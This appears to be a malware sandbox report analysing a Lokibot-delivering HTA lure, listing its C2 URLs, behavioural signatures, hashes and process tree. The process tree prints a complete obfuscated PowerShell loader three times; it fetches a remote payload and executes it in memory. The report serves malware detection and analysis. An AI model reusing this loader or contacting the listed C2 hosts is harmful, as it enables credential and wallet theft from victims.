Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
143s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
01/10/2024, 07:10
General
-
Target
PiedvjumapieprasjumsVentspilsAugstskolasLV240926hta.hta
-
Size
7KB
-
MD5
6478016f557127bcb15e168eb8275c75
-
SHA1
595e5d9cc7472660ec4e0c182a633014a43c974c
-
SHA256
acc9d013bc7c54953fd61c5626bcb2378452656ab98a3ef7c9bdeb5b57455933
-
SHA512
b5a9873d8c1ea36d7aae2e4974f233616221a316deb05ca5dd8b1c423f191c8cd8538f55d13f4d62cc4dab9347bd4b45d93f7dab5acf2d91f7041ceeb578ec46
-
SSDEEP
96:bpYfMEPTs5q+PgNbvrQZwJrOX32pdF60+oKOnPFIi/fds1R7b8eEj+ErV3/53/yw:yVsiBvrQSNOWp1nh1y7bgq+VRPFih8Gc
Score
10/10
Malware Config
Extracted
Family
lokibot
C2
http://168.100.10.152/index.php/wp.php?view=1
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Blocklisted process makes network request 11 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 13 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\PiedvjumapieprasjumsVentspilsAugstskolasLV240926hta.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
Filesize
46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
7KB
MD54d68c0025cbdf5dcba570c4ebba3db5c
SHA11ec9fdf1ea9049bb4e55bb4e297ac3bb3a4072fe
SHA256214e96125e5123e957a3435ed90714d83ff99d96345f0748c6a235b12c87c568
SHA512edd8b15c18662b2821516bc552145487e47a9559a5ea9d1ddfa25dab069eb5a45c963c88d3a51aa117fb9ce4944308606c66165d969b1c89bb01346ee7b546e8
-
Filesize
7KB
MD5e1c0b0064afe25488838284b2ebe6edb
SHA1857f5fe7256c0a9042f3d64f9eea5c875084e526
SHA256d3031b4c05fda8229566c7d66d3e0b792d925ae4150dc123d0fdee21d079ef01
SHA512443c79bdd765a6fefefee95bfc0ccb0eb89f79254583d3226ad7ffab8248b8c2105744bc70921b246ac5941ddeba96d584e514e50727e2e38a9ecd349f4ce1a3
-
Filesize
472KB
MD5183f1f76a0c8b3f31dc2cfea13cf9d18
SHA1ebe5f2cea1f7735bf57a6b7ed72259b2d1e773af
SHA25621a0922961a9c910c6d3763c41a17a6a687b7c6da22f8117e84c90c6b836553c
SHA512a1bd075f13086a534f8dbeab8428e0d75ccbbf176cf321eb1aa1e0c1a61ac54ddc1f0351aaa91e787fa4fb4f24bb8e477f9655dfb9d48b8cdd92379200b5f3e7
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
37.4MB
-
Filesize
2.9MB
-
Filesize
32KB